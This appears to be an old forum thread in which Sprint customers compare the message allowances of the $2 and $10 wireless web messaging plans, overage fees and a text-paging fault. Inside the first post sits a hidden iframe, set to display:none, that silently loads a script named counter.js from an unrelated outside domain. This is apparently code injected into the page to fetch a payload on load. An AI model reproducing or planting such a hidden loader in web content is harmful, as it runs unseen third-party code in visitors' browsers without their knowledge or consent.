Difference in the $2 and $10 Wireless Web Messageing Plans

Anyone know the usage difference in the $2/month and the $10/month wireless web messaging plans? Of course Sprint's web site does not explain the difference and I do not have the entire weekend to talk to braindead customer support people from Sprint who probably will not know what I am talking about anyway. So, I ask the experts.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The number of text messages/web alerts included. I forget the numbers, but you get something like 500 for $10 and maybe 50 for $2. Not sure of the numbers, but that is the difference.

I think Kim may know this one.

i believe your on point MJ. it comes down to if you use a lot of alerts or not in determining which plan is best for you.

I use a lot. Just wondering what the volumes are. I think I need the $10/month, but would like to see if the $2 would suit my needs.

Carl, you get 30 extra messages for $2 and 500 extra messages for $10. With the wirelessweb plan you get an automatic 50 messages.

If you go over your alloted number, the charge is .10 per message.

Thanks Kimberly:
That is what I needed. I guess it is the 500/month extra for me.

I couldn't find the info on the web site. I logged on to my account and looked at the list of options, but the description for the $2 and $10 package are EXACTLY the same, but neither mentions HOW MANY messages you get. They are brain dead.

Carl, currently they are not "charging" me for my messages and I assume that it is because they have been having trouble with their text paging for about 2 months now.

I have noticed, while viewing my account usage information, that of the 50 alloted messages I get with my WW package I still have 50 messages remaining, even tho I get several pages daily.

Before signing up for anything, you may wanna ride it out, see how long they are gonna waive the message allowance.

hmmmmmmm...not really sure what you mean. I get pages using mynumber@messaging.sprintpcs, I get web alerts (shortmail), and I get email notifications.

For the past couple months I have not been getting the full allowable 160 characters in my text pages (I only get about 140), and when I call about it, they tell me they are aware of this nationwide problem and are working on it. Two months later, same problem, so I assumed that until they get the problem fixed they weren't counting messages against the alloted number.

???

I was just going to remind you that someone noted that email notices are not counted against that number. Or at least through sprint mail that is....
